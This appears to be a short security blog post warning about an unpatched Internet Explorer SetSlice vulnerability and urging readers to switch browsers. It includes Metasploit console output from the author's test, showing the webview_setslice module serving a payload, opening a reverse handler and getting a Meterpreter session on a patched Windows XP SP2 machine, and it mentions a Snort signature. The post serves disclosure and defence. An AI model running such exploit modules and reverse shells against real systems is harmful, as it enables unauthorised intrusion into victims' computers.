MSIE SetSlice Vuln

This is starting to sound like a broken record, but there's yet another unpatched vulnerability for MSIE with a public exploit. This one was posted to the browser fun blog on July 18th, and Metasploit just released a working exploit about an hour ago.

If you are still using MSIE, its time to switch browsers. The Internet just isn't a safe place for Internet Explorer right now.

I was able to use this to compromise a fully patched Windows XP SP2 box, as you can see below:

msf exploit(webview_setslice) > exploit
[*] Started reverse handler
[*] Using URL: http://172.30.1.202:8080/slice
[*] Server started.
[*] Exploit running as background job.
msf exploit(webview_setslice) > [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.30.1.202:4343 -> 172.30.1.213:1056)

msf exploit(webview_setslice) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: WINXP-CLIENT
OS      : Windows XP (Build 2600, Service Pack 2). 

Update: the metasploit module source is available here. It supports XP SP0-2.

Update2: I've written a snort signature for this.  It hasn't been fully tested yet, let me know how it works for you.